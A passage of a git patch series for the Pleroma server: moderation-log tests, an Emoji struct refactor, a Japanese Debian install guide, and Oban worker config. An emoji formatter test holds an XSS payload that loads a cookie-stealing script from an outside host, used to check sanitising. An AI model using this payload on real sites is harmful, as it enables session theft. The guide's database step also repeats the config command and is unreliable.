+
+ conn1 = get(conn, "/api/pleroma/admin/moderation_log?user_id=#{moderator.id}")
+
+ response1 = json_response(conn1, 200)
+ [first_entry] = response1
+
+ assert response1 |> length() == 1
+ assert get_in(first_entry, ["data", "actor", "id"]) == moderator.id
+ end
+
+ test "returns log filtered by search", %{conn: conn, moderator: moderator} do
+ ModerationLog.insert_log(%{
+ actor: moderator,
+ action: "relay_follow",
+ target: "https://example.org/relay"
+ })
+
+ ModerationLog.insert_log(%{
+ actor: moderator,
+ action: "relay_unfollow",
+ target: "https://example.org/relay"
+ })
+
+ conn1 = get(conn, "/api/pleroma/admin/moderation_log?search=unfo")
+
+ response1 = json_response(conn1, 200)
+ [first_entry] = response1
+
+ assert response1 |> length() == 1
+
+ assert get_in(first_entry, ["data", "message"]) ==
+ "@#{moderator.nickname} unfollowed relay: https://example.org/relay"
+ end
end
end
From 4d6e22bb9b718846883e92851ba22e9809b6b93d Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sat, 31 Aug 2019 01:09:48 +0300
Subject: [PATCH 019/272] Style
---
lib/pleroma/moderation_log.ex | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/lib/pleroma/moderation_log.ex b/lib/pleroma/moderation_log.ex
index c72a413b6..89a5e13c3 100644
--- a/lib/pleroma/moderation_log.ex
+++ b/lib/pleroma/moderation_log.ex
@@ -248,8 +248,12 @@ def insert_log(%{
|> insert_log_entry_with_message()
end
- @spec insert_log(%{actor: User, action: String.t(), nicknames: [String.t()], tags: [String.t()]}) ::
- {:ok, ModerationLog} | {:error, any}
+ @spec insert_log(%{
+ actor: User,
+ action: String.t(),
+ nicknames: [String.t()],
+ tags: [String.t()]
+ }) :: {:ok, ModerationLog} | {:error, any}
def insert_log(%{
actor: %User{} = actor,
nicknames: nicknames,
From 6ef0103ca0b194971a2e6f61685316536b742a11 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Sat, 31 Aug 2019 10:14:53 +0300
Subject: [PATCH 020/272] added Emoji struct
---
lib/pleroma/emoji.ex | 15 ++++++++++++++
lib/pleroma/emoji/formatter.ex | 12 +++++------
lib/pleroma/emoji/loader.ex | 13 +++---------
lib/pleroma/web/common_api/utils.ex | 2 +-
.../controllers/mastodon_api_controller.ex | 2 +-
.../controllers/util_controller.ex | 6 ++----
test/emoji/formatter_test.exs | 20 ++++++++++++++-----
test/emoji_test.exs | 8 ++++----
8 files changed, 47 insertions(+), 31 deletions(-)
diff --git a/lib/pleroma/emoji.ex b/lib/pleroma/emoji.ex
index ab6ba7d6a..b246bfbe6 100644
--- a/lib/pleroma/emoji.ex
+++ b/lib/pleroma/emoji.ex
@@ -21,6 +21,21 @@ defmodule Pleroma.Emoji do
{:read_concurrency, true}
]
+ defstruct [:code, :file, :tags, :safe_code, :safe_file]
+
+ @doc "Build emoji struct"
+ def build({code, file, tags}) do
+ %__MODULE__{
+ code: code,
+ file: file,
+ tags: tags,
+ safe_code: Pleroma.HTML.strip_tags(code),
+ safe_file: Pleroma.HTML.strip_tags(file)
+ }
+ end
+
+ def build({code, file}), do: build({code, file, []})
+
@doc false
def start_link(_) do
GenServer.start_link(__MODULE__, [], name: __MODULE__)
diff --git a/lib/pleroma/emoji/formatter.ex b/lib/pleroma/emoji/formatter.ex
index acdef3988..4869d073e 100644
--- a/lib/pleroma/emoji/formatter.ex
+++ b/lib/pleroma/emoji/formatter.ex
@@ -15,12 +15,12 @@ def emojify(text, nil), do: text
def emojify(text, emoji, strip \\ false) do
Enum.reduce(emoji, text, fn
- {_, _, _, emoji, file}, text ->
+ {_, %Emoji{safe_code: emoji, safe_file: file}}, text ->
String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
- emoji_data, text ->
- emoji = HTML.strip_tags(elem(emoji_data, 0))
- file = HTML.strip_tags(elem(emoji_data, 1))
+ {unsafe_emoji, unsafe_file}, text ->
+ emoji = HTML.strip_tags(unsafe_emoji)
+ file = HTML.strip_tags(unsafe_file)
String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
end)
|> HTML.filter_tags()
@@ -40,7 +40,7 @@ def demojify(text, nil), do: text
@doc "Outputs a list of the emoji-shortcodes in a text"
def get_emoji(text) when is_binary(text) do
- Enum.filter(Emoji.get_all(), fn {emoji, _, _, _, _} ->
+ Enum.filter(Emoji.get_all(), fn {emoji, %Emoji{}} ->
String.contains?(text, ":#{emoji}:")
end)
end
@@ -50,7 +50,7 @@ def get_emoji(_), do: []
@doc "Outputs a list of the emoji-Maps in a text"
def get_emoji_map(text) when is_binary(text) do
get_emoji(text)
- |> Enum.reduce(%{}, fn {name, file, _group, _, _}, acc ->
+ |> Enum.reduce(%{}, fn {name, %Emoji{file: file}}, acc ->
Map.put(acc, name, "#{Pleroma.Web.Endpoint.static_url()}#{file}")
end)
end
diff --git a/lib/pleroma/emoji/loader.ex b/lib/pleroma/emoji/loader.ex
index 82fc3b8c3..839316713 100644
--- a/lib/pleroma/emoji/loader.ex
+++ b/lib/pleroma/emoji/loader.ex
@@ -11,13 +11,14 @@ defmodule Pleroma.Emoji.Loader do
* glob paths, nested folder is used as tag name for grouping e.g. priv/static/emoji/custom/nested_folder
"""
alias Pleroma.Config
+ alias Pleroma.Emoji
require Logger
@type pattern :: Regex.t() | module() | String.t()
@type patterns :: pattern() | [pattern()]
@type group_patterns :: keyword(patterns())
- @type emoji :: {String.t(), String.t(), list(String.t())}
+ @type emoji :: {String.t(), Emoji.t()}
@doc """
Loads emojis from files/packs.
@@ -81,15 +82,7 @@ def load do
Enum.map(emojis ++ emojis_txt, &prepare_emoji/1)
end
- defp prepare_emoji({code, file, tags} = _emoji) do
- {
- code,
- file,
- tags,
- Pleroma.HTML.strip_tags(code),
- Pleroma.HTML.strip_tags(file)
- }
- end
+ defp prepare_emoji({code, _, _} = emoji), do: {code, Emoji.build(emoji)}
defp load_pack(pack_dir, emoji_groups) do
pack_name = Path.basename(pack_dir)
diff --git a/lib/pleroma/web/common_api/utils.ex b/lib/pleroma/web/common_api/utils.ex
index d6907f707..1fb95f4ab 100644
--- a/lib/pleroma/web/common_api/utils.ex
+++ b/lib/pleroma/web/common_api/utils.ex
@@ -436,7 +436,7 @@ def confirm_current_password(user, password) do
def emoji_from_profile(%{info: _info} = user) do
(Emoji.Formatter.get_emoji(user.bio) ++ Emoji.Formatter.get_emoji(user.name))
- |> Enum.map(fn {shortcode, url, _, _, _} ->
+ |> Enum.map(fn {shortcode, %Emoji{file: url}} ->
%{
"type" => "Emoji",
"icon" => %{"type" => "Image", "url" => "#{Endpoint.url()}#{url}"},
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 4f63b03cf..a50c060bf 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -331,7 +331,7 @@ def peers(conn, _params) do
defp mastodonized_emoji do
Pleroma.Emoji.get_all()
- |> Enum.map(fn {shortcode, relative_url, tags, _, _} ->
+ |> Enum.map(fn {shortcode, %Pleroma.Emoji{file: relative_url, tags: tags}} ->
url = to_string(URI.merge(Web.base_url(), relative_url))
%{
diff --git a/lib/pleroma/web/twitter_api/controllers/util_controller.ex b/lib/pleroma/web/twitter_api/controllers/util_controller.ex
index 923480242..c14792068 100644
--- a/lib/pleroma/web/twitter_api/controllers/util_controller.ex
+++ b/lib/pleroma/web/twitter_api/controllers/util_controller.ex
@@ -239,11 +239,9 @@ def version(conn, _params) do
def emoji(conn, _params) do
emoji =
- Emoji.get_all()
- |> Enum.map(fn {short_code, path, tags, _, _} ->
- {short_code, %{image_url: path, tags: tags}}
+ Enum.reduce(Emoji.get_all(), %{}, fn {code, %Emoji{file: file, tags: tags}}, acc ->
+ Map.put(acc, code, %{image_url: file, tags: tags})
end)
- |> Enum.into(%{})
json(conn, emoji)
end
diff --git a/test/emoji/formatter_test.exs b/test/emoji/formatter_test.exs
index 8b510f48b..6d25fc453 100644
--- a/test/emoji/formatter_test.exs
+++ b/test/emoji/formatter_test.exs
@@ -3,6 +3,7 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Emoji.FormatterTest do
+ alias Pleroma.Emoji
alias Pleroma.Emoji.Formatter
use Pleroma.DataCase
@@ -20,15 +21,17 @@ test "it does not add XSS emoji" do
text =
"I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
- custom_emoji = %{
- "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+ custom_emoji =
+ {
+ "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)",
"https://placehold.it/1x1"
- }
+ }
+ |> Pleroma.Emoji.build()
expected_result =
"I love "
- assert Formatter.emojify(text, custom_emoji) == expected_result
+ assert Formatter.emojify(text, [{custom_emoji.code, custom_emoji}]) == expected_result
end
end
@@ -37,7 +40,14 @@ test "it returns the emoji used in the text" do
text = "I love :firefox:"
assert Formatter.get_emoji(text) == [
- {"firefox", "/emoji/Firefox.gif", ["Gif", "Fun"], "firefox", "/emoji/Firefox.gif"}
+ {"firefox",
+ %Emoji{
+ code: "firefox",
+ file: "/emoji/Firefox.gif",
+ tags: ["Gif", "Fun"],
+ safe_code: "firefox",
+ safe_file: "/emoji/Firefox.gif"
+ }}
]
end
diff --git a/test/emoji_test.exs b/test/emoji_test.exs
index 82f9c52ff..1fdbd0fdf 100644
--- a/test/emoji_test.exs
+++ b/test/emoji_test.exs
@@ -14,9 +14,9 @@ defmodule Pleroma.EmojiTest do
test "first emoji", %{emoji_list: emoji_list} do
[emoji | _others] = emoji_list
- {code, path, tags, _, _} = emoji
+ {code, %Emoji{file: path, tags: tags}} = emoji
- assert tuple_size(emoji) == 5
+ assert tuple_size(emoji) == 2
assert is_binary(code)
assert is_binary(path)
assert is_list(tags)
@@ -24,9 +24,9 @@ test "first emoji", %{emoji_list: emoji_list} do
test "random emoji", %{emoji_list: emoji_list} do
emoji = Enum.random(emoji_list)
- {code, path, tags, _, _} = emoji
+ {code, %Emoji{file: path, tags: tags}} = emoji
- assert tuple_size(emoji) == 5
+ assert tuple_size(emoji) == 2
assert is_binary(code)
assert is_binary(path)
assert is_list(tags)
From 7808eee9aa4a02c289173a45e0b02def3bf51773 Mon Sep 17 00:00:00 2001
From: AkiraFukushima
Date: Sat, 31 Aug 2019 16:23:15 +0900
Subject: [PATCH 021/272] Update Japanese document to follow English document
---
docs/installation/debian_based_jp.md | 141 +++++++++++++--------------
1 file changed, 70 insertions(+), 71 deletions(-)
diff --git a/docs/installation/debian_based_jp.md b/docs/installation/debian_based_jp.md
index caf72363b..5ca6b3634 100644
--- a/docs/installation/debian_based_jp.md
+++ b/docs/installation/debian_based_jp.md
@@ -5,180 +5,179 @@
## インストール
-このガイドはDebian Stretchを仮定しています。Ubuntu 16.04でも可能です。
+このガイドはDebian Stretchを利用することを想定しています。Ubuntu 16.04や18.04でもおそらく動作します。また、ユーザはrootもしくはsudoにより管理者権限を持っていることを前提とします。もし、以下の操作をrootユーザで行う場合は、 `sudo` を無視してください。ただし、`sudo -Hu pleroma` のようにユーザを指定している場合には `su -s $SHELL -c 'command'` を代わりに使ってください。
### 必要なソフトウェア
-- PostgreSQL 9.6+ (postgresql-contrib-9.6 または他のバージョンの PSQL をインストールしてください)
-- Elixir 1.5 以上 ([Debianのリポジトリからインストールしないこと!!! ここからインストールすること!](https://elixir-lang.org/install.html#unix-and-unix-like))。または [asdf](https://github.com/asdf-vm/asdf) を pleroma ユーザーでインストール。
-- erlang-dev
+- PostgreSQL 9.6以上 (Ubuntu16.04では9.5しか提供されていないので,[](https://www.postgresql.org/download/linux/ubuntu/)こちらから新しいバージョンを入手してください)
+- postgresql-contrib 9.6以上 (同上)
+- Elixir 1.5 以上 ([Debianのリポジトリからインストールしないこと!!! ここからインストールすること!](https://elixir-lang.org/install.html#unix-and-unix-like)。または [asdf](https://github.com/asdf-vm/asdf) をpleromaユーザーでインストールしてください)
+ - erlang-dev
- erlang-tools
- erlang-parsetools
+- erlang-eldap (LDAP認証を有効化するときのみ必要)
- erlang-ssh
-- erlang-xmerl (Jessieではバックポートからインストールすること!)
+- erlang-xmerl
- git
- build-essential
-- openssh
-- openssl
-- nginx prefered (Apacheも動くかもしれませんが、誰もテストしていません!)
-- certbot (または何らかのACME Let's encryptクライアント)
+
+#### このガイドで利用している追加パッケージ
+
+- nginx (おすすめです。他のリバースプロキシを使う場合は、参考となる設定をこのリポジトリから探してください)
+- certbot (または何らかのLet's Encrypt向けACMEクライアント)
### システムを準備する
* まずシステムをアップデートしてください。
```
-apt update && apt dist-upgrade
+sudo apt update
+sudo apt full-upgrade
```
-* 複数のツールとpostgresqlをインストールします。あとで必要になるので。
+* 上記に挙げたパッケージをインストールしておきます。
```
-apt install git build-essential openssl ssh sudo postgresql-9.6 postgresql-contrib-9.6
+sudo apt install git build-essential postgresql postgresql-contrib
```
-(postgresqlのバージョンは、あなたのディストロにあわせて変えてください。または、バージョン番号がいらないかもしれません。)
+
### ElixirとErlangをインストールします
* Erlangのリポジトリをダウンロードおよびインストールします。
```
-wget -P /tmp/ https://packages.erlang-solutions.com/erlang-solutions_1.0_all.deb && sudo dpkg -i /tmp/erlang-solutions_1.0_all.deb
+wget -P /tmp/ https://packages.erlang-solutions.com/erlang-solutions_1.0_all.deb
+sudo dpkg -i /tmp/erlang-solutions_1.0_all.deb
```
* ElixirとErlangをインストールします、
```
-apt update && apt install elixir erlang-dev erlang-parsetools erlang-xmerl erlang-tools erlang-ssh
+sudo apt update
+sudo apt install elixir erlang-dev erlang-parsetools erlang-xmerl erlang-tools erlang-ssh
```
### Pleroma BE (バックエンド) をインストールします
-* 新しいユーザーを作ります。
-```
-adduser pleroma
-```
-(Give it any password you want, make it STRONG)
+* Pleroma用に新しいユーザーを作ります。
-* 新しいユーザーをsudoグループに入れます。
```
-usermod -aG sudo pleroma
+sudo useradd -r -s /bin/false -m -d /var/lib/pleroma -U pleroma
```
-* 新しいユーザーに変身し、ホームディレクトリに移動します。
-```
-su pleroma
-cd ~
-```
+**注意**: Pleromaユーザとして単発のコマンドを実行したい場合はは、`sudo -Hu pleroma command` を使ってください。シェルを使いたい場合は `sudo -Hu pleroma $SHELL`です。もし `sudo` を使わない場合は、rootユーザで `su -l pleroma -s $SHELL -c 'command'` とすることでコマンドを、`su -l pleroma -s $SHELL` とすることでシェルを開始できます。
* Gitリポジトリをクローンします。
```
-git clone -b master https://git.pleroma.social/pleroma/pleroma
+sudo mkdir -p /opt/pleroma
+sudo chown -R pleroma:pleroma /opt/pleroma
+sudo -Hu pleroma git clone -b master https://git.pleroma.social/pleroma/pleroma /opt/pleroma
```
* 新しいディレクトリに移動します。
```
-cd pleroma/
+cd /opt/pleroma
```
* Pleromaが依存するパッケージをインストールします。Hexをインストールしてもよいか聞かれたら、yesを入力してください。
```
-mix deps.get
+sudo -Hu pleroma mix deps.get
```
* コンフィギュレーションを生成します。
```
-mix pleroma.instance gen
+sudo -Hu pleroma mix pleroma.instance gen
```
* rebar3をインストールしてもよいか聞かれたら、yesを入力してください。
- * この処理には時間がかかります。私もよく分かりませんが、何らかのコンパイルが行われているようです。
- * あなたのインスタンスについて、いくつかの質問があります。その回答は `config/generated_config.exs` というコンフィギュレーションファイルに保存されます。
+ * このときにpleromaの一部がコンパイルされるため、この処理には時間がかかります。
+ * あなたのインスタンスについて、いくつかの質問されます。この質問により `config/generated_config.exs` という設定ファイルが生成されます。
-**注意**: メディアプロクシを有効にすると回答して、なおかつ、キャッシュのURLは空欄のままにしている場合は、`generated_config.exs` を編集して、`base_url` で始まる行をコメントアウトまたは削除してください。そして、上にある行の `true` の後にあるコンマを消してください。
* コンフィギュレーションを確認して、もし問題なければ、ファイル名を変更してください。
```
mv config/{generated_config.exs,prod.secret.exs}
```
-* これまでのコマンドで、すでに `config/setup_db.psql` というファイルが作られています。このファイルをもとに、データベースを作成します。
+* 先程のコマンドで、すでに `config/setup_db.psql` というファイルが作られています。このファイルをもとに、データベースを作成します。
```
-sudo su postgres -c 'psql -f config/setup_db.psql'
+sudo -Hu pleroma mix pleroma.instance gen
```
-* そして、データベースのミグレーションを実行します。
+* そして、データベースのマイグレーションを実行します。
```
-MIX_ENV=prod mix ecto.migrate
+sudo -Hu pleroma MIX_ENV=prod mix ecto.migrate
```
-* Pleromaを起動できるようになりました。
+* これでPleromaを起動できるようになりました。
```
-MIX_ENV=prod mix phx.server
+sudo -Hu pleroma MIX_ENV=prod mix phx.server
```
-### インストールを終わらせる
+### インストールの最終段階
-あなたの新しいインスタンスを世界に向けて公開するには、nginxまたは何らかのウェブサーバー (プロクシ) を使用する必要があります。また、Pleroma のためにシステムサービスファイルを作成する必要があります。
+あなたの新しいインスタンスを世界に向けて公開するには、nginx等のWebサーバやプロキシサーバをPleromaの前段に使用する必要があります。また、Pleroma のためにシステムサービスファイルを作成する必要があります。
#### Nginx
* まだインストールしていないなら、nginxをインストールします。
```
-apt install nginx
+sudo apt install nginx
```
* SSLをセットアップします。他の方法でもよいですが、ここではcertbotを説明します。
certbotを使うならば、まずそれをインストールします。
```
-apt install certbot
+sudo apt install certbot
```
そしてセットアップします。
```
-mkdir -p /var/lib/letsencrypt/.well-known
-% certbot certonly --email your@emailaddress --webroot -w /var/lib/letsencrypt/ -d yourdomain
+sudo mkdir -p /var/lib/letsencrypt/
+sudo certbot certonly --email -d --standalone
```
-もしうまくいかないときは、先にnginxを設定してください。ssl "on" を "off" に変えてから再試行してください。
+もしうまくいかないときは、nginxが正しく動いていない可能性があります。先にnginxを設定してください。ssl "on" を "off" に変えてから再試行してください。
---
-* nginxコンフィギュレーションの例をnginxフォルダーにコピーします。
+* nginxの設定ファイルサンプルをnginxフォルダーにコピーします。
```
-cp /home/pleroma/pleroma/installation/pleroma.nginx /etc/nginx/sites-enabled/pleroma.nginx
+sudo cp /opt/pleroma/installation/pleroma.nginx /etc/nginx/sites-available/pleroma.nginx
+sudo ln -s /etc/nginx/sites-available/pleroma.nginx /etc/nginx/sites-enabled/pleroma.nginx
```
-* nginxを起動する前に、コンフィギュレーションを編集してください。例えば、サーバー名、証明書のパスなどを変更する必要があります。
+* nginxを起動する前に、設定ファイルを編集してください。例えば、サーバー名、証明書のパスなどを変更する必要があります。
* nginxを再起動します。
```
-systemctl reload nginx.service
+sudo systemctl enable --now nginx.service
```
+もし証明書を更新する必要が出てきた場合には、nginxの関連するlocationブロックのコメントアウトを外し、以下のコマンドを動かします。
+
+```
+sudo certbot certonly --email -d --webroot -w /var/lib/letsencrypt/
+```
+
+#### 他のWebサーバやプロキシ
+これに関してはサンプルが `/opt/pleroma/installation/` にあるので、探してみてください。
+
#### Systemd サービス
-* サービスファイルの例をコピーします。
+* サービスファイルのサンプルをコピーします。
```
-cp /home/pleroma/pleroma/installation/pleroma.service /usr/lib/systemd/system/pleroma.service
+sudo cp /opt/pleroma/installation/pleroma.service /etc/systemd/system/pleroma.service
```
-* サービスファイルを変更します。すべてのパスが正しいことを確認してください。また、`[Service]` セクションに以下の行があることを確認してください。
+* サービスファイルを変更します。すべてのパスが正しいことを確認してください
+* サービスを有効化し `pleroma.service` を開始してください
```
-Environment="MIX_ENV=prod"
+sudo systemctl enable --now pleroma.service
```
-* `pleroma.service` を enable および start してください。
+#### 初期ユーザの作成
+
+新たにインスタンスを作成したら、以下のコマンドにより管理者権限を持った初期ユーザを作成できます。
+
```
-systemctl enable --now pleroma.service
+sudo -Hu pleroma MIX_ENV=prod mix pleroma.user new --admin
```
-#### モデレーターを作る
-
-新たにユーザーを作ったら、モデレーター権限を与えたいかもしれません。以下のタスクで可能です。
-```
-mix set_moderator username [true|false]
-```
-
-モデレーターはすべてのポストを消すことができます。将来的には他のことも可能になるかもしれません。
-
-#### メディアプロクシを有効にする
-
-`generate_config` でメディアプロクシを有効にしているなら、すでにメディアプロクシが動作しています。あとから設定を変更したいなら、[How to activate mediaproxy](How-to-activate-mediaproxy) を見てください。
-
-#### コンフィギュレーションとカスタマイズ
+#### その他の設定とカスタマイズ
* [Backup your instance](backup.html)
* [Configuration tips](general-tips-for-customizing-pleroma-fe.html)
From a90ea8ba1562818b025f677ffeea35f7ca08ddf2 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Sat, 31 Aug 2019 19:08:56 +0300
Subject: [PATCH 022/272] [#1149] Addressed code review comments (code style,
jobs pruning etc.).
---
CHANGELOG.md | 2 +-
config/config.exs | 2 +-
config/test.exs | 2 +
docs/config.md | 56 ++++++++++++++++++-
lib/pleroma/activity_expiration_worker.ex | 6 +-
lib/pleroma/application.ex | 2 +-
lib/pleroma/digest_email_worker.ex | 4 +-
lib/pleroma/emails/mailer.ex | 4 +-
lib/pleroma/scheduled_activity_worker.ex | 2 +-
lib/pleroma/user.ex | 2 +-
lib/pleroma/web/activity_pub/activity_pub.ex | 2 +-
.../mrf/mediaproxy_warming_policy.ex | 2 +-
lib/pleroma/web/activity_pub/publisher.ex | 2 +-
.../web/activity_pub/transmogrifier.ex | 4 +-
lib/pleroma/web/federator/federator.ex | 8 +--
lib/pleroma/web/federator/publisher.ex | 9 +--
lib/pleroma/web/oauth/token/clean_worker.ex | 2 +-
lib/pleroma/web/push/push.ex | 6 +-
lib/pleroma/web/salmon/salmon.ex | 2 +-
.../workers/activity_expiration_worker.ex | 21 +++++++
lib/pleroma/workers/background_worker.ex | 19 ++-----
lib/pleroma/workers/helper.ex | 13 -----
.../workers/{mailer.ex => mailer_worker.ex} | 19 +++----
.../{publisher.ex => publisher_worker.ex} | 8 ++-
.../{receiver.ex => receiver_worker.ex} | 4 +-
.../workers/scheduled_activity_worker.ex | 2 +-
.../{subscriber.ex => subscriber_worker.ex} | 4 +-
...smogrifier.ex => transmogrifier_worker.ex} | 6 +-
.../{web_pusher.ex => web_pusher_worker.ex} | 4 +-
lib/pleroma/workers/worker_helper.ex | 23 ++++++++
test/user_test.exs | 2 +-
.../activity_pub_controller_test.exs | 2 +-
test/web/federator_test.exs | 2 +-
test/web/websub/websub_test.exs | 2 +-
34 files changed, 163 insertions(+), 87 deletions(-)
create mode 100644 lib/pleroma/workers/activity_expiration_worker.ex
delete mode 100644 lib/pleroma/workers/helper.ex
rename lib/pleroma/workers/{mailer.ex => mailer_worker.ex} (58%)
rename lib/pleroma/workers/{publisher.ex => publisher_worker.ex} (76%)
rename lib/pleroma/workers/{receiver.ex => receiver_worker.ex} (83%)
rename lib/pleroma/workers/{subscriber.ex => subscriber_worker.ex} (88%)
rename lib/pleroma/workers/{transmogrifier.ex => transmogrifier_worker.ex} (73%)
rename lib/pleroma/workers/{web_pusher.ex => web_pusher_worker.ex} (82%)
create mode 100644 lib/pleroma/workers/worker_helper.ex
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 8b73c783f..c9d6fef17 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -19,7 +19,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Mastodon API: Unsubscribe followers when they unfollow a user
- AdminAPI: Add "godmode" while fetching user statuses (i.e. admin can see private statuses)
- Improve digest email template
-- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) with [Oban](https://github.com/sorentwo/oban)
+- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings).
- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
### Fixed
diff --git a/config/config.exs b/config/config.exs
index da89aa3e9..6fb4a0969 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -470,7 +470,7 @@
config :pleroma, Oban,
repo: Pleroma.Repo,
verbose: false,
- prune: {:maxage, 60 * 60 * 24 * 7},
+ prune: {:maxlen, 1500},
queues: [
activity_expiration: 10,
federator_incoming: 50,
diff --git a/config/test.exs b/config/test.exs
index 0ef809ac1..df512b5d7 100644
--- a/config/test.exs
+++ b/config/test.exs
@@ -65,6 +65,8 @@
queues: false,
prune: :disabled
+config :pleroma, Pleroma.Scheduler, jobs: []
+
config :pleroma, Pleroma.ScheduledActivity,
daily_user_limit: 2,
total_user_limit: 3,
diff --git a/docs/config.md b/docs/config.md
index 2e351e272..29a4d4c97 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -404,20 +404,29 @@ curl "http://localhost:4000/api/pleroma/admin/invite_token?admin_token=somerando
[Oban](https://github.com/sorentwo/oban) asynchronous job processor configuration.
+Configuration options described in [Oban readme](https://github.com/sorentwo/oban#usage):
+* `repo` - app's Ecto repo (`Pleroma.Repo`)
+* `verbose` - logs verbosity
+* `prune` - non-retryable jobs [pruning settings](https://github.com/sorentwo/oban#pruning) (`:disabled` / `{:maxlen, value}` / `{:maxage, value}`)
+* `queues` - job queues (see below)
+
Pleroma has the following queues:
+* `activity_expiration` - Activity expiration
* `federator_outgoing` - Outgoing federation
* `federator_incoming` - Incoming federation
-* `mailer` - Email sender, see [`Pleroma.Emails.Mailer`](#pleroma-emails-mailer)
+* `mailer` - Email sender, see [`Pleroma.Emails.Mailer`](#pleromaemailsmailer)
* `transmogrifier` - Transmogrifier
* `web_push` - Web push notifications
-* `scheduled_activities` - Scheduled activities, see [`Pleroma.ScheduledActivities`](#pleromascheduledactivity)
+* `scheduled_activities` - Scheduled activities, see [`Pleroma.ScheduledActivity`](#pleromascheduledactivity)
Example:
```elixir
config :pleroma, Oban,
repo: Pleroma.Repo,
+ verbose: false,
+ prune: {:maxlen, 1500},
queues: [
federator_incoming: 50,
federator_outgoing: 50
@@ -426,12 +435,37 @@ config :pleroma, Oban,
This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the number of max concurrent jobs set to `50`.
+### Migrating `pleroma_job_queue` settings
+
+`config :pleroma_job_queue, :queues` is replaced by `config :pleroma, Oban, :queues` and uses the same format (keys are queues' names, values are max concurrent jobs numbers).
+
+### Note on running with PostgreSQL in silent mode
+
+If you are running PostgreSQL in [`silent_mode`](https://postgresqlco.nf/en/doc/param/silent_mode?version=9.1), it's advised to set [`log_destination`](https://postgresqlco.nf/en/doc/param/log_destination?version=9.1) to `syslog`,
+otherwise `postmaster.log` file may grow because of "you don't own a lock of type ShareLock" warnings (see https://github.com/sorentwo/oban/issues/52).
+
## :workers
Includes custom worker options not interpretable directly by `Oban`.
* `retries` — keyword lists where keys are `Oban` queues (see above) and values are numbers of max attempts for failed jobs.
+Example:
+
+```elixir
+config :pleroma, :workers,
+ retries: [
+ federator_incoming: 5,
+ federator_outgoing: 5
+ ]
+```
+
+### Migrating `Pleroma.Web.Federator.RetryQueue` settings
+
+* `max_retries` is replaced with `config :pleroma, :workers, retries: [federator_outgoing: 5]`
+* `enabled: false` corresponds to `config :pleroma, :workers, retries: [federator_outgoing: 1]`
+* deprecated options: `max_jobs`, `initial_timeout`
+
## Pleroma.Web.Metadata
* `providers`: a list of metadata providers to enable. Providers available:
* Pleroma.Web.Metadata.Providers.OpenGraph
@@ -491,6 +525,24 @@ config :auto_linker,
]
```
+## Pleroma.Scheduler
+
+Configuration for [Quantum](https://github.com/quantum-elixir/quantum-core) jobs scheduler.
+
+See [Quantum readme](https://github.com/quantum-elixir/quantum-core#usage) for the list of supported options.
+
+Example:
+
+```elixir
+config :pleroma, Pleroma.Scheduler,
+ global: true,
+ overlap: true,
+ timezone: :utc,
+ jobs: [{"0 */6 * * * *", {Pleroma.Web.Websub, :refresh_subscriptions, []}}]
+```
+
+The above example defines a single job which invokes `Pleroma.Web.Websub.refresh_subscriptions()` every 6 hours ("0 */6 * * * *", [crontab format](https://en.wikipedia.org/wiki/Cron)).
+
## Pleroma.ScheduledActivity
* `daily_user_limit`: the number of scheduled activities a user is allowed to create in a single day (Default: `25`)
diff --git a/lib/pleroma/activity_expiration_worker.ex b/lib/pleroma/activity_expiration_worker.ex
index 5c0c53232..7aba7eece 100644
--- a/lib/pleroma/activity_expiration_worker.ex
+++ b/lib/pleroma/activity_expiration_worker.ex
@@ -9,13 +9,13 @@ defmodule Pleroma.ActivityExpirationWorker do
alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web.CommonAPI
- alias Pleroma.Workers.BackgroundWorker
+ alias Pleroma.Workers.ActivityExpirationWorker
require Logger
use GenServer
import Ecto.Query
- defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+ import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
@schedule_interval :timer.minutes(1)
@@ -57,7 +57,7 @@ def handle_info(:perform, state) do
"op" => "activity_expiration",
"activity_expiration_id" => expiration.id
}
- |> BackgroundWorker.new(worker_args(:activity_expiration))
+ |> ActivityExpirationWorker.new(worker_args(:activity_expiration))
|> Repo.insert()
end)
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 7d38ed5c4..f8f866dbd 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -43,7 +43,7 @@ def start(_type, _args) do
hackney_pool_children() ++
[
Pleroma.Stats,
- {Oban, Application.get_env(:pleroma, Oban)},
+ {Oban, Pleroma.Config.get(Oban)},
%{
id: :web_push_init,
start: {Task, :start_link, [&Pleroma.Web.Push.init/0]},
diff --git a/lib/pleroma/digest_email_worker.ex b/lib/pleroma/digest_email_worker.ex
